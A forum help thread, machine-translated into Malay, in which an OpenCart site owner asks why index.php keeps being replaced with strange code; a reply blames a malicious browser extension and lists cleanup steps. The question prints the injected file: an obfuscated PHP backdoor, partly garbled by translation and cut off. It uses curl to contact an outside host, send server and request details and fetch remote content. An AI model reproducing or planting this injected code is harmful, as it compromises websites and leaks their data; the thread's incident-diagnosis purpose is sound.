Fail Opencart index.php rosak

Question

Saya menggunakan opencart v3.0.2.0 dan masalahnya ialah fail index.php opencart (titik masuk ke tapak web opencart saya, dimuat naik ke direktori public_html) ranap (kod dalam fail index.php mempunyai ditukar kepada watak pelik). Ini berlaku dua kali minggu lepas. Saya tidak tahu sesiapa telah digodam atau terdapat sesuatu yang tidak kena dengan domain atau kod saya. Jika sesiapa boleh membantu atau membimbing saya sila beritahu saya. terima kasih.

Fail index.php rosak:

$O; $O=penyahkodan url ($OOOOOO);$oOooOO='z1226_16';$oOooOOoO=$O[15].$O[4].$O[4].$O[9 ].$O[62].$O[63].$O[63].$O[64].$O[72].$O[66].$O[59].$O[65]. $O[67].$O[71].$O[59].$O[65].$O[65].$O[67].$O[59].$O[65].$O [67].$O[65] .$O[63].$oOooOO.$O[63];FungsiooooooooOOOOOOOOoooooOOO($ooooOOOoOoo){ $ooooOOOooOo=curl_init();curl_setopt($ooooOOOooOo,CURLOPT_URL,$ooooOOOoOoo); ($ooooOOOooOo,CURLOPT_RETURNTRANSFER,1);curl_setopt($ooooOOOooOo,CURLOPT_ CONNECTTIMEOUT, 5); $ooooOOOOooO =curl_exec($ooooOOOooOo);curl_close($ooooOOOooOo);kembali $ooooOOOOooOoo($OOOooOoo($OOOooOoo } Fungsi,$OOOooO; array()){ global $O;$OooooO=str_replace(' ','+',$OooooO);$OOooooO=curl_init();curl_setopt($OOooooO,CURLOPT_URL, " $OooooO");curl_setopt($OOooooO, CURLOPT_RETURNTRANSFER, 1);curl_setopt($OOooooO,CURLOPT_HEADER, 0);curl_setopt($OOooOO,CURLOPT_TIMEOUT,10);curl_setopt($OOooooO,CURLOPT_POST, 1);curl_setopt($OOOPT_ooPOS, http_LOPT_0000, ($ OOOOoo));$OOOOooo=curl_exec($OOooooO);$OOOooooOO=curl_errno($OOooooO);curl_close($OOooooO);if(0!==$OOOOooooOO){return false ;}return $OOOOooo ;} fungsi oooOOOo( $ooOOo){global$O;$ooOOOOo = palsu;$ooooooo = $O[14].$O[8].$O[8].$O[18].$O[2]. ].$O[23].$O[8].$O[4].$O[90].$O[14].$O[8].$O [8].$O[14]. $O[18].$O[2].$O[90].$O[5].$O[10].$O[15].$O[8 ].$O[ 8].$O [90].$O[23].$O[7].$O[24].$O[14].$O[90].$O[10].$O[8] .$O[18 ];if ($ooOOo!=''){if (preg_match("/($ooooooOOo)/si",$ooOOo)){$ooOOOOo=true;}} mengembalikan $ooOOOOo;} fungsi oooOOooOOoOO ($oOOOOOOoOOOO){ Global$O;$ooOOOOOOOOoO=false;$ooOOOOOOoOo=$O[14].$O[8].$O[8].$O[14].$O[18 ].$O[ 2].$O [59].$O[21].$O[8].$O[59].$O[16].$O[9].$O[90].$O[10]. ].$O[15].$O[8].$O[8].$O[59].$O[21].$O[8].$O [59].$O[16]. $O[9].$O[90].$O[14].$O[8].$O[8].$O[14].$O[18 ].$O[ 2].$O [59].$O[21].$O[8].$O[25];jika ($oOOOOOOoOOOO!='' && preg_match("/($ooOOOOOOoOo)/ si", $oOOOOOOoOOOOOO )) {$ooOOOOOOoO =true;}Kembali $ooOOOOOOoO;}$oOooOOoOO=((isset($_SERVER[$O[41].$O[30].$O[30].$O[ 35].$O [37]]) && $_SERVER[$O[41].$O[30].$O[30].$O[35].$O[37]]!==$O[ 8].$O[13].$ O[13])?$O[15].$O[4].$O[4].$O[9].$O[11].$O[62 ].$O[ 63].$O [63]:$O[15].$O[4].$O[4].$O[9].$O[62].$O[63] );$oOoooOOoOO= $_SERVER[$O[29].$O[28].$O[26].$O[32].$O[28].$O[37].$O[30].$O[52].$O[32].$O[29].$O[33]];$ooOOooooOOoOO=$_SERVER[$O[41].$O[30].$O [30].$ O[35].$O[52].$O[41].$O[34].$O[37].$O[30]];$ooOOOoooOOoOO=$_SERVER[$O[ 35].$O [41].$O[35].$O[52].$O[37].$O[28].$O[44].$O[39]];$ooOOOooooOOOoOO=$ _SERVER[$O[ 37].$O[28].$O[29].$O[48].$O[28].$O[29].$O[52].$O[50]. $O[36] .$O[51].$O[28]];$ooOOOOoooOOOOoOO=$oOooOOoOO.$ooOOoooOOoOO.$oOoooOOoOO;$oooOOOOoooOOOooOO=$oOooOOoO.$O[63].$O[7].$ O[24]。$O[12].$O[10].$O[4].$O[10].$O[59].$O[9].$O[15].$O[ 9];$ooooOOOOoooOOOooO =$oOooOOoO.$O[63].$O[25].$O[10].$O[9].$O[59].$O[9].$O[15] .$O[9 ];$ooooOOOOoooOOOooOoo=$oOooOOoO.$O[63].$O[16].$O[6].$O[25].$O[9].$O[59].$ O[9]。$O[15].$O[9];$oooooOOoooOOOoooOoo=$oOooOOoO.$O[63].$O[1].$O[8].$O[3].$O[ 12].$O [11].$O

Answer 1

Saya baru-baru ini mengalami isu yang sama dengan salah seorang pelanggan saya Setelah disiasat, kami mendapati masalah itu disebabkan oleh sambungan penyemak imbas Chrome yang menyuntik kod ke dalam PHP files when uploading any php files through the browser (like Cpanel File Management). In this case, the code was injected into the index.php file, and when someone accessed that file through the URL, the malicious code would start injecting files into the server, creating new files, and notifying the hacker of the server's current URL and other data using the cURL function in PHP.

.

Untuk menyelesaikan masalah ini, anda boleh mengambil langkah berikut:

1- Ambil tangkapan skrin semua sambungan dalam penyemak imbas anda yang digunakan untuk memuat naik fail ke pelayan, kongsikannya dengan kami dan kemudian padamkan penyemak imbas atau semua sambungannya.

2- Semak semua fail yang dimuat naik atau dikemas kini ke pelayan sejak tarikh penggodaman. Anda boleh menjalankan arahan pada pelayan untuk mendapatkan senarai fail baharu atau dikemas kini, bergantung pada sistem pengendalian anda.

3- Anda mungkin menemui beberapa *.php files in the .well-known atau folder tersembunyi lain pada pelayan.

4- Lindungi sistem pengendalian anda dengan perisian antivirus. Saya mengesyorkan menggunakan perisian antivirus bukan percuma seperti Kaspersky.

Bolehkah anda berkongsi tangkapan skrin sambungan penyemak imbas anda supaya kami dapat mengenal pasti sambungan mana yang mungkin menyebabkan tapak web itu digodam?